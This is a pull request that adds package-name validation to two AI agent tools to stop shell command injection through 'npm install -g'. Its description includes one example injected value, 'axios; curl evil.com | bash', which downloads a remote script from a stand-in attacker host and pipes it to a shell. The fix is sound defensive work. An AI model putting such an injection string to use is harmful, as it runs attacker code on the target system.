### PR TITLE
fix: install_npm_package and install_mcp_server lack inline package name validation

### DIFF
--- a/src/agent/tools.ts
+++ b/src/agent/tools.ts
@@ -418,6 +418,11 @@ export function createBuiltinTools(sandboxId: string): AutomatonTool[] {
       },
       execute: async (args, ctx) => {
         const pkg = args.package as string;
+        // Defense-in-depth: validate package name inline in case the
+        // policy engine's validate.package_name rule is bypassed.
+        if (!/^[@a-zA-Z0-9._\/-]+$/.test(pkg)) {
+          return `Blocked: invalid package name "${pkg}"`;
+        }
         const result = await ctx.conway.exec(
           `npm install -g ${pkg}`,
           60000,
@@ -789,6 +794,11 @@ Model: ${ctx.inference.getDefaultModel()}
       },
       execute: async (args, ctx) => {
         const pkg = args.package as string;
+        // Defense-in-depth: validate package name inline in case the
+        // policy engine's validate.package_name rule is bypassed.
+        if (!/^[@a-zA-Z0-9._\/-]+$/.test(pkg)) {
+          return `Blocked: invalid package name "${pkg}"`;
+        }
         const result = await ctx.conway.exec(`npm install -g ${pkg}`, 60000);
 
         if (result.exitCode !== 0) {


### PR DESCRIPTION
## Summary

`install_npm_package` and `install_mcp_server` pass user-supplied package names directly into shell commands via string interpolation (`npm install -g ${pkg}`) without any inline validation.

The `exec` tool has `FORBIDDEN_COMMAND_PATTERNS` as defense-in-depth (the codebase comments document this as a "secondary safety net in case the policy engine is bypassed"), but these two tools construct equivalent shell commands without any such guard.

A malicious package name like `axios; curl evil.com | bash` would be passed directly to the shell.

Added inline regex validation (`/^[@a-zA-Z0-9._\/-]+$/`) matching the policy engine's `validate.package_name` rule pattern, blocking shell metacharacters before exec.

## Test plan

- [x] New tests: 6 malicious package names blocked for `install_npm_package`
- [x] New tests: 6 malicious package names blocked for `install_mcp_server`
- [x] New tests: clean package names and scoped packages pass through
- [x] All 936 existing tests pass with no regressions

🤖 Generated with [Claude Code](https://claude.com/claude-code)